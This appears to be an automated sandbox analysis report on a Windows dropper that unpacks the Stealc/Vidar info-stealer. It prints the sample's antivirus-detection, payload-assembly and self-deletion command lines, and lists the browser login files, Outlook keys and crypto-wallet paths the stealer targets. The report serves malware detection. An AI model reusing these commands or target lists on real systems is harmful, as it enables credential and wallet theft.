Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0043106F mov eax, dword ptr fs:[00000030h] 15_2_0043106F
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00419750 mov eax, dword ptr fs:[00000030h] 16_2_00419750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 15_2_002B88CD
Enables debug privileges
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0028A354 SetUnhandledExceptionFilter, 15_2_0028A354
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0028A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_0028A385
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0042B513 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_0042B513
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00411613 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00411613
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_004117A6 SetUnhandledExceptionFilter, 15_2_004117A6
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00410A48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00410A48
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0041AD48
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0041CEEA SetUnhandledExceptionFilter, 16_2_0041CEEA
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_0041B33A
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C16B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_6C16B66C
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C16B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_6C16B1F7
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_6C31AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_6C31AC62
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Memory written: C:\Users\user\AppData\Local\Temp\464151\Blank.pif base: 400000 value starts with: 4D5A Jump to behavior
Searches for specific processes (likely to inject)
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 16_2_00419600
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002B9369 LogonUserW, 15_2_002B9369
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00275240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 15_2_00275240
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C1AC6 SendInput,keybd_event, 15_2_002C1AC6
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C51E2 mouse_event, 15_2_002C51E2
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 464151 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DHappenedWestminsterUnexpected" Heat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Theaters + ..\Keeping + ..\Estimate + ..\Tribute + ..\Nails + ..\Kingdom + ..\New + ..\Tears + ..\Zoo V Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Blank.pif V Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif C:\Users\user\AppData\Local\Temp\464151\Blank.pif Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process created: C:\Users\user\AppData\Local\Temp\1248.tmp.exe "C:\Users\user\AppData\Local\Temp\1248.tmp.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\LocalCGIDAAAKJJ.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 15_2_002B88CD
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 15_2_002C4F1C
Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002904000.00000004.00000020.00020000.00000000.sdmp, Blank.pif, 0000000B.00000000.2148275702.0000000000316000.00000002.00000001.01000000.00000008.sdmp, Blank.pif, 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Blank.pif Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0028885B cpuid 15_2_0028885B
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: EnumSystemLocalesW, 15_2_004362B1
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 15_2_0043C4EA
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: GetLocaleInfoW, 15_2_004366A4
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: EnumSystemLocalesW, 15_2_0043C762
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: EnumSystemLocalesW, 15_2_0043C7AD
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: EnumSystemLocalesW, 15_2_0043C848
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 15_2_0043C8D5
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: GetLocaleInfoW, 15_2_0043CB25
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 15_2_0043CC4E
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: GetLocaleInfoW, 15_2_0043CD55
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 15_2_0043CE22
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 16_2_00417B90
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Queries volume information: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002A0030 GetLocalTime,__swprintf, 15_2_002A0030
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002A0722 GetUserNameW, 15_2_002A0722
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_0029416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 15_2_0029416A
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.19.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.19.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 16.2.1248.tmp.exe.a00e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.1248.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.1248.tmp.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.1248.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.1248.tmp.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.1248.tmp.exe.a00e67.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3346073741.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.3002753873.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
Source: 1248.tmp.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
Source: 1248.tmp.exe String found in binary or memory: \exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Source: 1248.tmp.exe String found in binary or memory: *.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: Blank.pif Binary or memory string: WIN_81
Source: Blank.pif Binary or memory string: WIN_XP
Source: Blank.pif Binary or memory string: WIN_XPe
Source: Blank.pif Binary or memory string: WIN_VISTA
Source: Blank.pif Binary or memory string: WIN_7
Source: Blank.pif Binary or memory string: WIN_8
